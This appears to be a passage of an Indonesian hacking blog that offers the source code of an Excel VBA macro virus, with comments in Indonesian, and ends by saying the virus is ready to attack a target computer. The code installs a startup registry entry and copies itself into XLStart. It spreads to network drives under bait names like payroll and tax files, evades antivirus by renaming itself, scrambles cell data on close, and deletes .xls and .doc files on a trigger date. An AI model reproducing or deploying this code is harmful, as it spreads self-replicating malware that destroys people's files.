KillAV = RegOpenKeyExA(HKEY_LOCAL_MACHINE, “Software\Microsoft\Windows” & _
“CurrentVersion\Run”, 0, KEY_ALL_ACCESS, s)
KillAV = RegSetValueExA(s, AVstr, 0, 1, “c:\windows\rundll.exe”, 0)
KillAV = RegCloseKey(s)
Application.DisplayAlerts = False
If Right(ActiveWorkbook.Name, 3) = “xls” Then
ActiveWindow.Visible = False
workbooks.Add
End If
XBrnd
‘membuat file Xlstart yang isinya file yg terinfeksi
‘membuat tulisan pada sheet active
strup = Application.StartupPath
If Dir(strup & “” & “*.xls”) = “” Then
pnm = ActiveWorkbook.Name
Apnm = ActiveWorkbook.FullName
OtherVrs = Dir(strup & “” & “*.xls”)
If OtherVrs <> “” Then
workbooks(OtherVrs).Close
Kill strup & “” & OtherVrs
End If
workbooks(pnm).SaveAs FileName:=strup & “” & Myclub & “.xls”
ActiveWindow.Visible = False
workbooks.Open (Apnm)
End If
For n = 67 To 90
l = Chr(n)
drv = l & “:”
d3 = DrvID(drv)
If d3 = “network” Then snd2drv (drv)
Next
nmpers = Dir(strup & “” & “*.xls”)
Application.OnSheetActivate = “” & strup & “” & nmpers & “!XLBomb”
If Month(Now()) = 7 And Day(Now()) = 7 Then
Range(”A1″).Insert
Range(”A1″).Select
With Selection.Font
.Name = “Arial”
.FontStyle = “Bold”
.Size = 18
.ColorIndex = 7
End With
ActiveCell.FormulaR1C1 = “Living in the DARKSIDE to watch your Life”
MessBoard
cari
End If
Application.StatusBar = False
Application.DisplayAlerts = True
Application.ScreenUpdating = True
End Sub
‘Penularan pada workbook yg aktif
‘add sheet xlSheetVeryHidden sebagai otorisasi
’sorry mcafee aku selalu merubah ini bila terdeteksi
Sub XLBomb()
On Error Resume Next
XlsBmb = “c:\Trough.WQK” ‘rubah baris ini bila virus kamu terdeteksi
Application.DisplayAlerts = False
Application.ScreenUpdating = False
aktip = ActiveWorkbook.Name
sedang = ThisWorkbook.Name
Set mcraktip = workbooks(aktip).VBProject.VBComponents
Set modaktip = ActiveWorkbook.VBProject.VBComponents
Set mymcr = ThisWorkbook.VBProject.VBComponents
If aktip <> “Book1″ And aktip <> “Book2″ Then
For NS = 1 To Sheets.Count
If Sheets(NS).Name = “S1L3N7″ Then
kz = Sheets(NS).Name
Exit For
End If
kz = Sheets(NS).Name
Next NS
If kz <> “S1L3N7″ Then
Sheets.Add
ActiveWindow.ActiveSheet.Name = “S1L3N7″
Sheets(”S1L3N7″).Visible = xlSheetVeryHidden
Else
susun
Sheets(”S1L3N7″).Range(”A7″) = “”
End If
For nm = 1 To mcraktip.Count
If mcraktip(nm).Type = 1 Then
nama = mcraktip(nm).Name
Exit For
End If
Next nm
modaktip.Remove modaktip(nm)
For nm = 1 To mymcr.Count
If mymcr(nm).Type = 1 Then
nama = mymcr(nm).Name
Exit For
End If
Next nm
mymcr(nama).Export XlsBmb
modaktip.Import XlsBmb
Kill XlsBmb
XBrnd
ActiveWorkbook.VBProject.VBComponents(nm).Name = Myclub
If Minute(Now()) > 30 And Weekday(Now()) Mod 2 = 0 Then
Application.StatusBar = “Searching for 1RM4 at the network…”
End If
End If
Application.DisplayAlerts = True
End Sub
‘duplikasi virus dengan berbagai nama secara RANDOM
Private Sub XBrnd()
Dim Sbjt, Bodd
On Error GoTo nil1
Randomize
Sbjt = Array(”Primitif”, “Conspiracy”, “mydata”, “OnJuly”, “Updater”, “ms0ffice”, _
“letme”, “poisoning”, “yourdream”)
Myclub = Sbjt(Rnd * 9 + 1)
Exit Sub
nil1:
Myclub = Sbjt(0)
End Sub
‘hihi.. macro di kawinkan sama worm yaaa gini ini
‘tularkan pada semua drive & network yang telah di MAPPING
Function DrvID(drv3)
On Error Resume Next
Dim fso, d, t
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set d = fso.getdrive(drv3)
Select Case d.drivetype
Case 0: t = “Unknown”
Case 1: t = “removable”
Case 2: t = “Fixed”
Case 3: t = “network”
Case 4: t = “CD-ROM”
Case 5: t = “Ramdisk”
End Select
If t = “” Then t = “none”
DrvID = t
End Function
Sub snd2drv(DrvAll)
On Error Resume Next
Application.DisplayAlerts = False
Application.ScreenUpdating = False
Gnm = ActiveWorkbook.Name
GnmF = ActiveWorkbook.FullName
Randomize
FlName = Array(”BankColapse”, “myacc”, “report”, “launch06″, “yourScrt”, “jobs”, _
“reference07″, “logistic”, _
“Payroll2006″, “NewCost”, “DoNotOpen”, “secretary”, “tax_report”, “Finance”, _
“director2006″)
Bread = FlName(Rnd * 14 + 1)
workbooks(Gnm).SaveAs FileName:=DrvAll & “” & Bread & “.xls”
workbooks(ActiveWorkbook.Name).Close
workbooks.Open (GnmF)
Application.DisplayAlerts = True
End Sub
Private Sub Auto_Close()
On Error Resume Next
If ActiveWorkbook.Name <> “Book1″ And ActiveWorkbook.Name <> “Book2″ Then
Application.ScreenUpdating = False
Application.DisplayAlerts = False
For NS = 1 To Sheets.Count
If Sheets(NS).Name = “S1L3N7″ Then
kz = Sheets(NS).Name
Exit For
End If
kz = Sheets(NS).Name
Next NS
If kz <> “S1L3N7″ Then
Sheets.Add
ActiveWindow.ActiveSheet.Name = “S1L3N7″
Sheets(”S1L3N7″).Visible = xlSheetVeryHidden
End If
CryptSTAT = Sheets(”S1L3N7″).Range(”A7″)
If CryptSTAT <> 1 Then
kacau
Sheets(”S1L3N7″).Range(”A7″) = 1
SvFl = Dir(Application.StartupPath & “” & “*.xls”)
workbooks(SvFl).Save
ActiveWorkbook.Save
End If
End If
End Sub
‘klo file d tutup basic encrypt
’supaya klo macro d hapus & DUUUAAARRR rusak file-nya
Sub kacau() ‘kurang setiap sheets
For i = 48 To 90 ‘48 as 0 and 90 as Z
If i <> 63 Then
huruf = Chr(i)
Cells.Replace What:=huruf, Replacement:=Chr(i + 110), LookAt:=xlPart, SearchOrder _
:=xlByRows, MatchCase:=False
End If
Next
End Sub
‘kembalikan (decrypt) struktur file saat d buka
Sub susun()
For i = 158 To 200
If i <> 173 Then
huruf = Chr(i)
Cells.Replace What:=huruf, Replacement:=Chr(i – 110), LookAt:=xlPart, SearchOrder _
:=xlByRows, MatchCase:=False
End If
Next
End Sub
‘hapus file xls,doc & file yg anda inginkan
‘membuat file tipuan dg nama sesuai folder
Sub cari()
On Error Resume Next
Dim nmfold1, nmfold2, pjg, kena As Integer
pnm = ActiveWorkbook.FullName
pjg = Len(pnm)
For i = 0 To 50
pjg = pjg – 1
If Right(Left(pnm, pjg), 1) = “” Then
foldbatas = Left(pnm, pjg)
Kill foldbatas & “*.xls”
Kill foldbatas & “*.doc”
Kill foldbatas & “irma.*”
If a = 0 Then
nmfold1 = Len(foldbatas) – 1
pnm = Left(pnm, nmfold1)
a = 1
Else
nmfold2 = Len(foldbatas) + 1
kena = nmfold1 – nmfold2
namekena = Right(pnm, kena + 1)
Application.ScreenUpdating = False
workbooks.Add (namekena & “.xls”)
ActiveWorkbook.Save
ActiveWorkbook.Close
Application.ScreenUpdating = True
Exit For
End If
End If
Next
End Sub
Oke sekarang virusnya udah siap tinggal serang computer target!!!!
sumber :
http://bukittinggihackers.wordpress.com/membuat-virus-yukkkk/